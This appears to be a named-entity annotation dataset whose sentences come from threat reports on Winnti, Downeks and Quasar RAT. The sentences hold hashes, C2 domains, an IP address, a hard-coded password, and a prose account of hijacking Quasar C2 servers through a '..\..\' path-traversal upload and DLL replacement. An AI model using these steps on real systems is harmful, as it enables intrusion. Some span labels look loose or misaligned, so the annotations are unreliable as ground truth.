{"text": "The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": [{"start": 46, "end": 52, "label": "Malware"}]}
{"text": "Microsoft Threat Intelligence continually tracks activity groups such as LEAD and BARIUM and documents the tactics , techniques , and procedures they employ in their attacks , with a special focus on the tools and infrastructure they use to facilitate those attacks .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 73, "end": 77, "label": "Organization"}, {"start": 82, "end": 88, "label": "Organization"}]}
{"text": "Windows Defender ATP continuously monitors protected systems for such indicators of hostile activity and alerts security operations center ( SOC ) personnel to their presence .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 112, "end": 138, "label": "System"}, {"start": 141, "end": 144, "label": "System"}]}
{"text": "To provide context around such alerts , Windows Defender ATP also features a short summary of the group \u2019s history , goals , methods , and tools , with links to extensive documentation for technically minded users .", "spans": [{"start": 40, "end": 60, "label": "System"}]}
{"text": "Windows Defender ATP is also capable of detecting previously unknown attacks by monitoring system behavior indicative of hostile activity , including :", "spans": [{"start": 0, "end": 20, "label": "System"}]}
{"text": "Malware installation , persistence , and activation .", "spans": []}
{"text": "Backdoor command and control .", "spans": []}
{"text": "Credential theft .", "spans": []}
{"text": "Lateral movement to other machines on the network .", "spans": []}
{"text": "For example , numerous malware families register themselves as services during installation to guarantee persistence across reboots .", "spans": []}
{"text": "A majority of malware that perform this persistence technique modify the necessary registry keys in ways that do not fit the profile of a legitimate program .", "spans": []}
{"text": "Winnti is no exception , and so , during Winnti \u2019s installation process , Windows Defender ATP is able to raise behavioral alerts .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 41, "end": 47, "label": "Malware"}, {"start": 74, "end": 94, "label": "System"}]}
{"text": "To improve coverage while minimizing false positives , Windows Defender ATP uses the intelligent security graph to differentiate between suspicious and benign behavior before generating alerts .", "spans": [{"start": 55, "end": 75, "label": "System"}]}
{"text": "It considers the age of the file , its global prevalence , and the presence and validity of a digital signature along with the method of service creation .", "spans": []}
{"text": "For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors , Windows Defender ATP provides rich , visualized technical context .", "spans": [{"start": 123, "end": 143, "label": "System"}]}
{"text": "This visual context enables SOC personnel to investigate alerts with all related artifacts , understand the scope of the breach , and prepare a comprehensive action plan .", "spans": []}
{"text": "In the screenshots below , Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk , loads the DLL using rundll32 , sets the DLL as a service , and saves a copy of itself in C:\\Windows\\Help .", "spans": [{"start": 27, "end": 47, "label": "System"}, {"start": 116, "end": 119, "label": "System"}, {"start": 140, "end": 143, "label": "System"}, {"start": 170, "end": 173, "label": "System"}]}
{"text": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer .", "spans": [{"start": 0, "end": 20, "label": "System"}]}
{"text": "Analysts can easily extract detailed information from these trees , such as the implant DLL dropped by the installer , the command used to call rundll32.exe and load the DLL , and the registry modifications that set the DLL as a service .", "spans": [{"start": 88, "end": 91, "label": "System"}, {"start": 144, "end": 156, "label": "Indicator"}, {"start": 170, "end": 173, "label": "System"}, {"start": 220, "end": 223, "label": "System"}]}
{"text": "This information can provide an initial means by which to assess the scope of the breach .", "spans": []}
{"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 0, "end": 30, "label": "System"}, {"start": 66, "end": 86, "label": "System"}]}
{"text": "If an intruder compromises a computer that has been onboarded to Windows Defender ATP , SOC personnel can isolate the computer from the network , blocking command and control of the implant and preventing attackers from installing additional malware and moving laterally to other computers in the network .", "spans": [{"start": 65, "end": 85, "label": "System"}]}
{"text": "Meanwhile , connectivity to the Windows Defender ATP service is maintained .", "spans": [{"start": 32, "end": 39, "label": "System"}]}
{"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 131, "end": 134, "label": "Indicator"}]}
{"text": "Another option is to simply halt and quarantine the Winnti implant itself , stopping the intrusion on a single machine .", "spans": [{"start": 52, "end": 66, "label": "Malware"}]}
{"text": "LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 9, "end": 15, "label": "Organization"}]}
{"text": "Nevertheless , Windows Defender ATP also supports blocking the implant across the entire enterprise , stopping large-scale intrusions in the early stages .", "spans": [{"start": 15, "end": 35, "label": "System"}]}
{"text": "With the enhanced post-breach detection capabilities of Windows Defender ATP , SOC personnel are able to reduce this period to hours or even minutes , significantly lessening the potential impact of persistent attacker access to their network .", "spans": [{"start": 9, "end": 52, "label": "System"}, {"start": 56, "end": 76, "label": "System"}]}
{"text": "Windows Defender ATP provides extensive information about activity groups responsible for the attacks , enabling customers to understand aspects of the attack that may not be obtained by network and endpoint sensors , such as common social engineering lures and the regional nature of an attack .", "spans": [{"start": 0, "end": 20, "label": "System"}]}
{"text": "With relevant visualized information , analysts are able to study malware behavior on impacted machines , so they can investigate further and plan out their response .", "spans": [{"start": 5, "end": 36, "label": "System"}]}
{"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": [{"start": 65, "end": 85, "label": "System"}]}
{"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": [{"start": 65, "end": 85, "label": "System"}]}
{"text": "Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 12, "end": 22, "label": "Malware"}]}
{"text": "Palo Alto Networks Traps Advanced Endpoint Protection recently prevented recent attacks that we believe are part of a campaign linked to DustySky .", "spans": [{"start": 0, "end": 53, "label": "Organization"}]}
{"text": "DustySky is a campaign which others have attributed to the Gaza Cybergang group , a group that targets government interests in the region .", "spans": [{"start": 59, "end": 79, "label": "Organization"}]}
{"text": "This report shares our researchers \u2019 analysis of the attack and Remote Access Tool ( RAT ) .", "spans": [{"start": 64, "end": 82, "label": "System"}]}
{"text": "We also discovered during our research that the RAT Server used by this attacker is itself vulnerable to remote attack , a double-edged sword for these attackers .", "spans": [{"start": 48, "end": 51, "label": "System"}]}
{"text": "The initial infection vector in this attack is not clear , but it results in installing the \u201c Downeks \u201d downloader , which in turn infects the victim computer with the \u201c Quasar \u201d RAT .", "spans": [{"start": 94, "end": 101, "label": "Malware"}, {"start": 170, "end": 176, "label": "Malware"}, {"start": 179, "end": 182, "label": "System"}]}
{"text": "Downeks uses third party websites to determine the external IP of the victim machine , possibly to determine victim location with GeoIP .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 13, "end": 33, "label": "System"}, {"start": 130, "end": 135, "label": "System"}]}
{"text": "It also drops decoy documents in an attempt to camouflage the attack .", "spans": []}
{"text": "Quasar is a .NET Framework-based open-source RAT .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 16, "label": "System"}, {"start": 45, "end": 48, "label": "System"}]}
{"text": "The attackers invested significant effort in attempting to hide the tool by changing the source code of the RAT and the RAT server , and by using an obfuscator and packer .", "spans": [{"start": 108, "end": 111, "label": "System"}, {"start": 120, "end": 123, "label": "System"}]}
{"text": "Unit 42 researchers observed the Quasar RA being prevented from executing on a Traps-protected client in September 2016 .", "spans": [{"start": 33, "end": 42, "label": "System"}]}
{"text": "We observed these Quasar samples :", "spans": [{"start": 18, "end": 24, "label": "Malware"}]}
{"text": "f-secure.exe : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f connects to hnoor.newphoneapp.com .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 15, "end": 79, "label": "Indicator"}, {"start": 92, "end": 113, "label": "Indicator"}]}
{"text": "HD_Audio.exe : 0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a connects to manual.newphoneapp.com .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 15, "end": 79, "label": "Indicator"}, {"start": 92, "end": 114, "label": "Indicator"}]}
{"text": "HD_Audio.exe : 86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 crashes upon execution . sim.exe 723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42 connects to hnoor.newphoneapp.com .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 15, "end": 79, "label": "Indicator"}, {"start": 105, "end": 112, "label": "Indicator"}, {"start": 113, "end": 177, "label": "Indicator"}, {"start": 190, "end": 211, "label": "Indicator"}]}
{"text": "Further research found other Quasar examples , an attack earlier in the month 2016 on the same target :", "spans": [{"start": 29, "end": 35, "label": "Malware"}]}
{"text": "SHA256 : 1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "We found the same Quasar code in an additional attack on the same day , but upon a different target .", "spans": [{"start": 18, "end": 24, "label": "Malware"}]}
{"text": "A second Quasar sample was also observed attacking this new victim :", "spans": [{"start": 9, "end": 15, "label": "Malware"}]}
{"text": "SHA256 : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "We do not have detailed visibility into the specific host attacked , and have not been able to reproduce the second stage of the attack in our lab .", "spans": []}
{"text": "However , based upon the timeframe of subsequent telemetry we observe , we understand the attack chain as follows :", "spans": []}
{"text": "The initial dropper ( which varies across attacks ) is delivered to the victim via email or web :", "spans": [{"start": 83, "end": 88, "label": "System"}]}
{"text": "File Name : Joint Ministerial Council between the GCC and the EU Council.exe \u201d .", "spans": [{"start": 12, "end": 76, "label": "Indicator"}]}
{"text": "SHA256 0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]}
{"text": "The initial dropper , upon execution , extracts an embedded Downeks instance :", "spans": [{"start": 60, "end": 67, "label": "Malware"}]}
{"text": "File Name : ati.exe .", "spans": [{"start": 12, "end": 19, "label": "Indicator"}]}
{"text": "SHA256 f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]}
{"text": "Downeks makes a POST request to dw.downloadtesting.com , resulting in the installation of the Quasar RAT on the victim machine .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 32, "end": 54, "label": "Indicator"}, {"start": 94, "end": 100, "label": "Malware"}, {"start": 101, "end": 104, "label": "System"}]}
{"text": "Additional Downeks downloaders connecting to the previously-observed server dw.downloadtesting.com were also found in this attack :", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 49, "end": 75, "label": "System"}, {"start": 76, "end": 98, "label": "Indicator"}]}
{"text": "SHA256 15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]}
{"text": "SHA256 9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740 .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]}
{"text": "Further research identified dozens of Dowenks and Quasar samples related to these attackers .", "spans": [{"start": 38, "end": 45, "label": "Malware"}, {"start": 50, "end": 56, "label": "Malware"}]}
{"text": "All included decoy document written in Arabic ( all related to Middle Eastern politics ) or Hebrew .", "spans": [{"start": 13, "end": 27, "label": "System"}]}
{"text": "Most of them use the same mutex structure , share the same fake icon and unique metadata details , file writes , registry operations , and fake common program metadata , as seen in DustySky samples .", "spans": [{"start": 26, "end": 31, "label": "System"}]}
{"text": "The Downeks downloader and Quasar C2 infrastructures are each self-contained and independent of each other .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 34, "end": 36, "label": "System"}]}
{"text": "However , we did find a single shared IP address demonstrably connecting the Downeks downloader and Quasar C2 infrastructure .", "spans": [{"start": 38, "end": 40, "label": "Indicator"}, {"start": 77, "end": 84, "label": "Malware"}, {"start": 100, "end": 106, "label": "Malware"}, {"start": 107, "end": 109, "label": "System"}]}
{"text": "We saw five samples built on the same date in December 2015 , and six on the same date in January , further solidifying the link between each sample .", "spans": []}
{"text": "We analyzed a Quasar sample we found that was communicating with an active C2 server at the time of analysis :", "spans": [{"start": 14, "end": 20, "label": "Malware"}, {"start": 75, "end": 77, "label": "System"}]}
{"text": "SHA256 : 4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "Quasar is a publicly-available commodity RAT , an evolution of his earlier xRAT , by German developer \u201c MaxXor \u201d .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 41, "end": 44, "label": "System"}, {"start": 75, "end": 79, "label": "System"}]}
{"text": "This sample is a modified version of Quasar , most likely forked from open source version 1.2.0.0 on GitHub .", "spans": [{"start": 37, "end": 43, "label": "Malware"}]}
{"text": "The client was likely built using the Quasar server client builder .", "spans": [{"start": 38, "end": 44, "label": "Malware"}]}
{"text": "We observed the following customizations :", "spans": []}
{"text": "C2 server : app.progsupdate.com , which resolved to 185.141.25.68 ) , over port 4664 .", "spans": [{"start": 0, "end": 2, "label": "System"}, {"start": 12, "end": 31, "label": "Indicator"}, {"start": 52, "end": 65, "label": "Indicator"}]}
{"text": "Quasar mutex name : VMFvdCsC7RFqerZinfV0sxJFo .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 20, "end": 45, "label": "Indicator"}]}
{"text": "Keylogger log location : Users\\hJTQwqwwSCkZU\\AppData\\Roaming\\GoogleDesktop\\<date> .", "spans": []}
{"text": "The malware uses fake version information to appear as a Microsoft update program , as well as Google Desktop once unpacked .", "spans": [{"start": 17, "end": 41, "label": "System"}, {"start": 57, "end": 66, "label": "Organization"}, {"start": 95, "end": 123, "label": "System"}]}
{"text": "This sample is packed by \u201c Netz \u201d , a simple .NET Framework packer which stores the original executable compressed ( zlib ) as a resource .", "spans": [{"start": 27, "end": 31, "label": "System"}, {"start": 45, "end": 49, "label": "System"}]}
{"text": "At runtime , the packer decompresses the resource and uses Reflection to load the assembly , find its Entry point , and Invoke it .", "spans": []}
{"text": "Extracting the payload is straight forward \u2013 we simply dump the resource and decompress it .", "spans": []}
{"text": "We discovered that the sample was obfuscated using .NET reactor .", "spans": [{"start": 19, "end": 29, "label": "Indicator"}, {"start": 34, "end": 44, "label": "System"}, {"start": 51, "end": 63, "label": "System"}]}
{"text": "It is possible to decompile the deobfuscated sample and retrieve most of the original source code but not enough to compile it easily .", "spans": []}
{"text": "After deobfuscation we extracted :", "spans": [{"start": 6, "end": 19, "label": "System"}]}
{"text": "SHA256 : d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "After decompiling the sample , we were able to document the modifications from the open-source Quasar .", "spans": [{"start": 95, "end": 101, "label": "Malware"}]}
{"text": "The configuration of Quasar is stored in the Settings object , which is encrypted with a password which is itself stored unencrypted .", "spans": [{"start": 21, "end": 27, "label": "Malware"}]}
{"text": "Modifications :", "spans": []}
{"text": "The ISCHECKIP and INSTARTUPFOLDER are not found in open source Quasar samples .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 18, "end": 33, "label": "Malware"}, {"start": 63, "end": 69, "label": "Malware"}]}
{"text": "The sample we analyzed is using RijndaelManaged with ECB mode and PKCS7 padding .", "spans": []}
{"text": "The key is the SHA256 hash of the hard-coded password .", "spans": []}
{"text": "The password of the sample we analyzed is : \u201c 6y7u^Y&U6y7u^Y&U6y7u^Y&U \u201d .", "spans": []}
{"text": "Although at first glance this appears somewhat complex , it is in fact a rather simple , repeated keyboard sequence .", "spans": []}
{"text": "We observe similar keyboard patterns in other samples : \u201c 567%^& \u201d , \u201c zxc!@#ASD \u201d .", "spans": []}
{"text": "Modifications :", "spans": []}
{"text": "Uses SHA256 instead of MD5 to create the key .", "spans": []}
{"text": "Uses RijndaelManaged instead of AES for encryption . ( with ECB mode , which is considered weak ) .", "spans": []}
{"text": "Quasar contains the NetSerializer library that handles serialization of high level IPacket objects that the client and server use to communicate .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 20, "end": 41, "label": "System"}, {"start": 108, "end": 125, "label": "System"}]}
{"text": "The serialization assigns unique IDs for serializable objects types .", "spans": []}
{"text": "The open source and several other samples we found give a dynamically-assigned 1 byte ID at compile time .", "spans": []}
{"text": "The sample we analyzed changed that behavior and hard-coded DWORD for each object type .", "spans": []}
{"text": "This is a better implementation , as it allows servers and clients from different versions to communicate with each other to some extent .", "spans": []}
{"text": "The sample we analyzed is most likely forked from open source quasar 1.2.0.0 .", "spans": [{"start": 62, "end": 76, "label": "Malware"}]}
{"text": "We find multiple file/object names hinting at the version , but must compelling :", "spans": []}
{"text": "Quasar version 1.1.0.0 names the encryption module name space \u201c Encryption \u201d , while subsequent Quasar versions use \u201c Cryptography \u201d \u2013 which we observe in this sample .", "spans": [{"start": 0, "end": 22, "label": "Malware"}, {"start": 96, "end": 111, "label": "Malware"}]}
{"text": "Quasar version 1.3.0.0 changed the encryption key generation , and stopped saving the password in the sample .", "spans": [{"start": 0, "end": 22, "label": "Malware"}]}
{"text": "There are more indications as well , such as names of objects , files etc .", "spans": []}
{"text": "Other samples we analyzed had different combinations of modification to cryptography and serialization .", "spans": []}
{"text": "Our decompilation of the serialization library was not complete enough to allow simple recompilation .", "spans": [{"start": 25, "end": 46, "label": "System"}]}
{"text": "Instead , we downloaded and compiled the 1.2.0.0 server of the open-source Quasar RAT , having determined that this seemed likely the most similar version .", "spans": [{"start": 75, "end": 85, "label": "Malware"}]}
{"text": "The out-of-the-box server could not communicate with the client sample owing to the previously documented modifications that we had observed .", "spans": [{"start": 4, "end": 25, "label": "System"}]}
{"text": "We incorporated those changes into our build , discovering that this worked for most sample versions with almost no further modification .", "spans": []}
{"text": "Both the client and the server use the same code to serialize and encrypt the communications .", "spans": [{"start": 24, "end": 30, "label": "System"}]}
{"text": "Instead of compiling a different server for each client , our server uses the code from within the client to communicate with it .", "spans": [{"start": 33, "end": 39, "label": "System"}, {"start": 58, "end": 68, "label": "System"}]}
{"text": "Using Reflection , the server can load the assembly of the client to find the relevant functions and passwords .", "spans": [{"start": 23, "end": 29, "label": "System"}]}
{"text": "This was more complex .", "spans": []}
{"text": "Both the client and server uses the same API , but the client serializer cannot serialize server objects , because they are not the same as their \u201c mirrored \u201d objects inside the client .", "spans": []}
{"text": "In some cases these objects are completely different , for example the server commands to get the file system .", "spans": []}
{"text": "Our solution is to :", "spans": []}
{"text": "Translate on the fly the objects the server send to mirrored matching client objects ( will not work if client doesn\u2019t have this object , or renamed it ) .", "spans": []}
{"text": "Copy the content from the server object into the new client object ( will not work if client implementation is different ) .", "spans": []}
{"text": "Serialize the client object ( which will be later encrypted and sent ) .", "spans": []}
{"text": "Deserialize the decrypted response into another client response object .", "spans": []}
{"text": "Translate the client response object into the server version of the client response object .", "spans": []}
{"text": "Copy the contents from the client response object into the translated server object .", "spans": []}
{"text": "Return the translated object .", "spans": []}
{"text": "Our sample communicates with app.progsupdate.com , which resolved to 185.141.25.68 , over TCP port 4664 .", "spans": [{"start": 29, "end": 48, "label": "Indicator"}, {"start": 69, "end": 82, "label": "Indicator"}, {"start": 90, "end": 93, "label": "Indicator"}]}
{"text": "The server sends a command . for example , \u201c Get System Information \u201d .", "spans": [{"start": 45, "end": 67, "label": "Indicator"}]}
{"text": "The command is translated to an IPacket of type GetSystemInfo .", "spans": []}
{"text": "The packet is serialized into a stream of bytes .", "spans": []}
{"text": "The stream of bytes is encrypted ( in some versions there is also optional compression step ) .", "spans": []}
{"text": "The stream of bytes is sent over TCP to the client .", "spans": [{"start": 33, "end": 36, "label": "Indicator"}]}
{"text": "The client receives and decrypts the packet .", "spans": []}
{"text": "The client deserializes the packet into IPacket GetSystemInfo .", "spans": []}
{"text": "The relevant handler of the client is called , collects the system information and sends it back inside IPacket of GetSystemInfoResponse .", "spans": []}
{"text": "Each of these layers seems to be different to some extent in the various samples we found .", "spans": []}
{"text": "The IPacket , Serialization and Encryption framework code is shared between the client and the server , therefore we can use it with Reflection .", "spans": []}
{"text": "However the Server handlers and command function are not , so we cannot create a completely perfect simulation .", "spans": []}
{"text": "The attacker can issue commands ( not all commands appear in different samples ) through the Quasar server GUI for each client :", "spans": [{"start": 93, "end": 110, "label": "System"}]}
{"text": "Get system information .", "spans": []}
{"text": "Get file system .", "spans": []}
{"text": "Upload / download / execute files .", "spans": []}
{"text": "Startup manager .", "spans": []}
{"text": "Open task manager .", "spans": []}
{"text": "Kill / start processes .", "spans": []}
{"text": "Edit registry .", "spans": []}
{"text": "Reverse Proxy .", "spans": []}
{"text": "Shutdown / restart the computer .", "spans": []}
{"text": "Open remote desktop connection .", "spans": []}
{"text": "Observe the desktop and actions of active user .", "spans": []}
{"text": "Issue remote mouse clicks and keyboard strokes .", "spans": []}
{"text": "Password stealing .", "spans": []}
{"text": "Retrieve Keylogger logs .", "spans": []}
{"text": "Visit website .", "spans": []}
{"text": "Display a message box .", "spans": []}
{"text": "The file system commands underling handlers and IPacket were modified to support more features , so these commands don\u2019t work out of the box and required manual implementation from us .", "spans": [{"start": 4, "end": 15, "label": "System"}]}
{"text": "With further analysis of the Quasar RAT C2 Server , we uncovered vulnerabilities in the server code , which would allow remote code execution .", "spans": [{"start": 29, "end": 39, "label": "Malware"}, {"start": 40, "end": 42, "label": "System"}]}
{"text": "This might allow a second attacker to install code of their choice \u2013 for example , their own Quasar RAT \u2013 on the original attacker \u2019s server .", "spans": [{"start": 93, "end": 103, "label": "Malware"}]}
{"text": "We refer to this ( somewhat ironic ) technique as a \u201c Double Edged Sword Attack \u201d .", "spans": []}
{"text": "We did not apply this to any live C2 servers \u2013 we only tested this with our own servers in our lab .", "spans": [{"start": 34, "end": 36, "label": "System"}]}
{"text": "In the lab , we changed our Quasar RAT source code to use the known encryption key , and to send fake victim IP address , City , Country code , Flag , and Username .", "spans": [{"start": 28, "end": 38, "label": "Malware"}, {"start": 109, "end": 111, "label": "Indicator"}]}
{"text": "The Quasar serve does not verify the RAT data , and displays this data in the RAT Server GUI when the RAT is executed and connects to the server .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 37, "end": 40, "label": "System"}, {"start": 78, "end": 81, "label": "System"}, {"start": 102, "end": 105, "label": "System"}]}
{"text": "We found this could be used to supply compelling \u201c victim data \u201d to convince the attacker to connect to this \u201c victim \u201d via the GUI .", "spans": []}
{"text": "Quasar serve includes a File Manager window , allowing the attacker to select victim files , and trigger file operations \u2013 for example , uploading a file from victim machine to server .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 24, "end": 43, "label": "System"}]}
{"text": "Uploaded files are written to the server sub directory \u201c clients\\user_name@machine_name_ipaddress \u201d .", "spans": [{"start": 57, "end": 97, "label": "Indicator"}]}
{"text": "Quasar serve does not verify that the size , filename , extension , or header of the uploaded file is the same as requested .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "Therefore , if we convince the attacker to request the file \u201c secret_info.doc ( 20KB ) \u201d , we can instead return to the server any file of our choice , of any size or type .", "spans": [{"start": 62, "end": 77, "label": "Indicator"}, {"start": 80, "end": 84, "label": "Indicator"}]}
{"text": "When the Quasar serve retrieves the name of the uploaded file from the victim , it does not verify that it is a valid file path .", "spans": [{"start": 9, "end": 15, "label": "Malware"}]}
{"text": "Therefore sending the file path \u201c ..\\..\\ secret_info.doc \u201d", "spans": [{"start": 34, "end": 56, "label": "Indicator"}]}
{"text": "will result in writing our file instead to the same directory as the Quasar serve code .", "spans": [{"start": 69, "end": 75, "label": "Malware"}]}
{"text": "Quasar serve does not even verify that a file was requested from the victim .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "Immediately when the File Manager window is opened by the attacker , the Quasar serve sends two commands to the RAT : GetDrives and listDirectory ( to populate the list of the victim \u2019s files in the RAT Server GUI ) .", "spans": [{"start": 17, "end": 40, "label": "System"}, {"start": 73, "end": 79, "label": "Malware"}, {"start": 112, "end": 115, "label": "System"}, {"start": 199, "end": 213, "label": "System"}]}
{"text": "We can respond to those commands by instead sending two files of our choice to the Quasar serve .", "spans": [{"start": 83, "end": 89, "label": "Malware"}]}
{"text": "Again , we control the content of the file , the size and the path and filename .", "spans": []}
{"text": "Quasar is a .NET Framework assembly , loading multiple DLLs upon launch , for example \u201c dnsapi.dll \u201d .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 26, "label": "System"}, {"start": 88, "end": 98, "label": "Indicator"}]}
{"text": "Quasar serve is vulnerable to a simple DLL hijacking attack , by using this technique to replace server DLLs .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 39, "end": 42, "label": "System"}]}
{"text": "When the attacker restarts the Quasar application , our uploaded \u201c dnsapi.dll \u201d will instead be loaded .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 67, "end": 77, "label": "Indicator"}]}
{"text": "Through this vector , we could drop our own Quasar clien on the attacker \u2019s server and execute it .", "spans": [{"start": 44, "end": 50, "label": "Malware"}]}
{"text": "Our Quasar RAT will connect to our own ( secured , of course ) Quasar serve , allowing us to control that attacker \u2019s server with his own RAT .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 63, "end": 69, "label": "Malware"}, {"start": 138, "end": 141, "label": "System"}]}
{"text": "We can also replace \u201c shfolder.dll \u201d ( and add a DLL export proxy to avoid a crash ) , which is loaded whenever the attacker clicks the builder tab \u2013 allowing us to infect the server while it runs , without the need to wait for application restart .", "spans": [{"start": 22, "end": 34, "label": "Indicator"}, {"start": 49, "end": 52, "label": "System"}]}
{"text": "Although Downeks has been publicly examined to some extent , our analysis found several features not previously described .", "spans": [{"start": 9, "end": 16, "label": "Malware"}]}
{"text": "Earlier Downeks samples were all written in native code .", "spans": [{"start": 8, "end": 15, "label": "Malware"}]}
{"text": "However , among our Downeks samples , we found new versions apparently written in .NET .", "spans": [{"start": 20, "end": 27, "label": "Malware"}, {"start": 82, "end": 86, "label": "System"}]}
{"text": "We observe many behavioral similarities and unique strings across both the native-Downeks versions , and the new .NET Downeks versions .", "spans": [{"start": 75, "end": 89, "label": "Malware"}, {"start": 113, "end": 117, "label": "System"}]}
{"text": "Almost all of the strings and behaviors we describe in this analysis of a .NET version are also present in the native version .", "spans": [{"start": 74, "end": 78, "label": "System"}]}
{"text": "We observed these samples deployed only against Hebrew-speaking targets .", "spans": []}
{"text": "Downeks .NET internal name is \u201c SharpDownloader \u201d , \u201c Sharp \u201d may be a reference to the language it was written in \u2013 C# .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 32, "end": 47, "label": "Malware"}, {"start": 117, "end": 119, "label": "System"}]}
{"text": "As seen in previous Downeks versions , it uses masquerades with icons , filenames and metadata imitating popular legitimate applications such as VMware workstation and CCleaner , or common file formats such as DOC and PDF .", "spans": [{"start": 20, "end": 27, "label": "Malware"}, {"start": 47, "end": 69, "label": "System"}, {"start": 72, "end": 81, "label": "System"}, {"start": 86, "end": 136, "label": "System"}, {"start": 145, "end": 163, "label": "System"}, {"start": 168, "end": 176, "label": "System"}, {"start": 210, "end": 213, "label": "System"}, {"start": 218, "end": 221, "label": "System"}]}
{"text": "All 3 samples were compiled with the same timestamp .", "spans": []}
{"text": "Downeks.NET is obfuscated using \u201c Yano \u201d and can be easily de-obfuscated using the de4dot utility .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 34, "end": 38, "label": "System"}, {"start": 79, "end": 97, "label": "System"}]}
{"text": "SHA256 : 4dcf5bd2c7a5822831d9f22f46bd2369c4c9df17cc99eb29975b5e8ae7e88606 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "SHA256 : 905f6a62749ca6f0fd33345d6a8b1831d87e9fd1f81a59cd3add82643b367693 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "SHA256 : c885f09b10feb88d7d176fe1a01ed8b480deb42324d2bb825e96fe1408e2a35f .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "Downeks is a backdoor with only very basic capabilities .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "It communicates with the C2 server using HTTP POST requests .", "spans": [{"start": 25, "end": 27, "label": "System"}, {"start": 41, "end": 45, "label": "Indicator"}]}
{"text": "It runs in an infinite loop , in each iteration it requests a command from the C2 , and then it sleeps for a time period it receives in the C2 response ( defaulting to 1 second if no sleep-time sent ) .", "spans": [{"start": 79, "end": 81, "label": "System"}, {"start": 140, "end": 142, "label": "System"}]}
{"text": "The data that is sent in the POST is serialized with json , which is then is encrypted , and finally encoded in base64 .", "spans": [{"start": 53, "end": 57, "label": "System"}]}
{"text": "The json format is typically { \u201cmth \u201d :", "spans": [{"start": 4, "end": 8, "label": "System"}]}
{"text": "\u201d some_method \u201d , \u201c data \u201d :", "spans": []}
{"text": "\u201d some_encrypted_data \u201d } .", "spans": []}
{"text": "The C2 S-TOOL server responds using the same format and serialization/encryption/encoding .", "spans": [{"start": 4, "end": 20, "label": "System"}]}
{"text": "As described in earlier analyses , Downeks \u2019 main purpose is as a downloader .", "spans": [{"start": 35, "end": 42, "label": "Malware"}]}
{"text": "Unfortunately , we were unable to get any C2 S-TOOL servers to issue download commands to any samples that we tested in our lab .", "spans": [{"start": 42, "end": 59, "label": "System"}]}
